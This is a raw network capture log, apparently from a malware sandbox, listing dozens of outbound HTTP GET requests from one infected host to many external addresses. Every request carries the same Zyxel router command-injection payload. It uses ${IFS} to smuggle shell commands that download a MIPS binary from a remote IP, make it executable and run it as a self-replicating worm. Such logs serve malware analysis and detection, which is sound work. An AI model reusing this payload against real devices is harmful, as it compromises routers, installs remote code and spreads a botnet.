                                            Feb 2, 2024 06:21:29.982045889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8841192.168.2.1560894125.107.69.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982098103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8842192.168.2.1553224198.209.238.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982098103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8843192.168.2.1541168112.18.137.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982115984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8844192.168.2.1546962138.27.16.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982153893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8845192.168.2.1560818153.140.200.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982186079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8846192.168.2.155590089.42.112.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982245922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8847192.168.2.154663812.148.111.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982299089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8848192.168.2.1541478193.16.245.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982321024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8849192.168.2.155623419.3.207.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982348919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8850192.168.2.1546974157.145.109.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982363939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8851192.168.2.15496084.155.24.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982419968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8852192.168.2.1535756165.150.179.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982517004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8853192.168.2.154416453.167.7.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982517004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8854192.168.2.15444145.227.128.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982604980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8855192.168.2.1555750141.115.84.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982605934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8856192.168.2.1542290146.54.45.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982604980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8857192.168.2.153372897.177.178.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982646942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8858192.168.2.1544626187.126.6.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982697964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8859192.168.2.154356894.106.106.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982739925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8860192.168.2.15495181.228.70.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982798100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8861192.168.2.153948065.88.86.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982844114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8862192.168.2.1548854124.53.97.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982877016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8863192.168.2.1543662106.66.113.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982901096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8864192.168.2.1544036152.245.20.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982942104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8865192.168.2.1543900136.242.108.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.982966900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8866192.168.2.155687295.210.54.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983062029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8867192.168.2.1537650221.241.135.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983073950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8868192.168.2.153838076.185.127.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983108044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8869192.168.2.153326697.252.58.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983120918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8870192.168.2.155490675.205.162.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983155012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8871192.168.2.155571493.84.79.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983186007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8872192.168.2.1534472137.37.14.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983253002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8873192.168.2.1545692175.22.46.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983293056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8874192.168.2.154998480.179.178.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983328104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8875192.168.2.1548654169.187.11.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983396053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8876192.168.2.1552132195.67.228.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983433008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8877192.168.2.1547936107.3.110.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983455896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8878192.168.2.155517234.218.181.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983529091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8879192.168.2.154219244.60.251.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983544111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8880192.168.2.156071480.88.86.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983545065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8881192.168.2.1557080212.63.133.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983594894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8882192.168.2.1536620219.247.190.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983652115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8883192.168.2.1560678146.115.8.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983683109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8884192.168.2.1559476139.116.83.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983745098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8885192.168.2.1544434169.18.178.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983760118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8886192.168.2.1558026205.174.140.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983822107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8887192.168.2.154665653.133.185.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983848095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8888192.168.2.155236693.157.243.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983874083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8889192.168.2.1536468180.52.26.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983944893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8890192.168.2.154229038.165.30.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.983994007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8891192.168.2.1560478119.25.240.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984071016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8892192.168.2.155517465.114.17.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984122038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8893192.168.2.1540672144.255.206.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984127998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8894192.168.2.1556196211.236.21.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984128952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8895192.168.2.154833659.241.154.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984164953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8896192.168.2.1556744110.123.206.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984225988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8897192.168.2.155693075.21.112.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984252930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8898192.168.2.155312054.41.52.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984306097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8899192.168.2.1540102151.85.136.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984316111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8900192.168.2.155254297.181.156.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984334946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8901192.168.2.1551074222.57.214.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984386921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8902192.168.2.1552222157.107.165.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984450102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8903192.168.2.1535552135.126.174.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.984455109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8904192.168.2.1559014134.163.99.216443
                                            TimestampBytes transferredDirectionData
